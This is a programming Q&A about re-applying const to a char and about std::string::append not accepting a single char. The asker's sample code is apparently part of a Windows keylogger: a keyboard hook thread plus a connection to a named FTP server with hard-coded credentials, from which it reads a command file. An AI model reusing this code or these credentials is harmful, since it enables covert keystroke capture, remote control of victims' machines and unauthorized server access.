# Is there any way to "reconst" a nonconst char?

Tags: c++, c, char, constants, tokenize

Say I have a char or a char array that is not consted. I modify it, etc.
Then I want to later turn off all modifications after.
Is there any way to reconst a char?
This question came when i was writing the following:
I had trouble appending each char element into a string (later fixed with operator +=).

```
#include <iostream>
#include <windows.h>
#include <process.h>
#include <string>
#include <Wininet.h>
#include <vector>

using std::string;
using std::cout;
using std::cin;
using std::vector;

unsigned int __stdcall keylogthreadhook(void *);
LRESULT CALLBACK LowLevelKeyboardProc(int, WPARAM, LPARAM);


string tempkeylog_buffer;
char ftpreadbuffer[1024];
vector<string> filetokens;

unsigned int threadid = 0;
DWORD numberread = 0;


int main(){

_beginthreadex(NULL,  0, &keylogthreadhook, NULL, 0, &threadid);

HINTERNET connection = InternetOpen("Keyclient", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);

cout << GetLastError();

HINTERNET ftpinstance = InternetConnect(connection, "ftp.drivehq.com", INTERNET_DEFAULT_FTP_PORT, "ludibrium", "22073kk", INTERNET_SERVICE_FTP, NULL, NULL);

cout << GetLastError();

HINTERNET filehandle = FtpOpenFile(ftpinstance, "command.txt", GENERIC_READ,FTP_TRANSFER_TYPE_ASCII, NULL);

cout << GetLastError();

InternetReadFile(filehandle, (char *)ftpreadbuffer, 1024, &numberread);

cout << GetLastError();

string temporarystr;


for(int i = 0; ftpreadbuffer[i] != '.'; i++){

    if(ftpreadbuffer[i] == '\n'){
        filetokens.push_back(temporarystr);
        temporarystr.clear();
    }

    temporarystr.append(ftpreadbuffer[i]); //error here!


}

cout << filetokens[0].c_str() << filetokens[1].c_str();




return 0;
}
```

Errors:-------------------------------------

```
invalid conversion from 'char' to 'const char*'|

error:   initializing argument 1 of 'std::basic_string<_CharT, _Traits, _Alloc>&       std::basic_string<_CharT, _Traits, _Alloc>::append(const _CharT*) [with _CharT = char, _Traits = std::char_traits<char>, _Alloc = std::allocator<char>]'|
```

Comment: You can create a const variable pointing to the existing data and use that instead.

Comment: Any non-`const` object can be treated as a `const` object. That is not related to your problem here: `std::string::append` takes a `const std::string &` or `const char *`, you give it a single `char`. If you really do mean to just append the single character at `ftpreadbuffer[i]`, use [`push_back`](http://en.cppreference.com/w/cpp/string/basic_string/push_back).

Answer (score 4):

I will use a simple way, for example:

```
std::string modifiable_string = "Hello";

modifiable_string += " Jack!";

...

const std::string &const_string = modifiable_string;
//                ^
//                It's up to you, you can drop it

...

just use const_string

const_string += " Bye"; // ERROR

...
```

Comment: @Kelvin: `(const string)modifiable_string` would produce a temporary `const string` and leave `modifiable_string` as a mutable `string`.

Comment: yes i understand. Why does this not work though:  temporarystr.append((const char *)ftpreadbuffer[i]);
when i try to cout the tokens it does not display anything. But something like ( i know that it has the matching function, but wouldnt the append have it as well since i used the (const char *) typecast?) temporarystr += ftpreadbuffer[i] works fine

Comment: @Kelvin See my comment on the question. Your real problem has nothing to do with `const`-ness.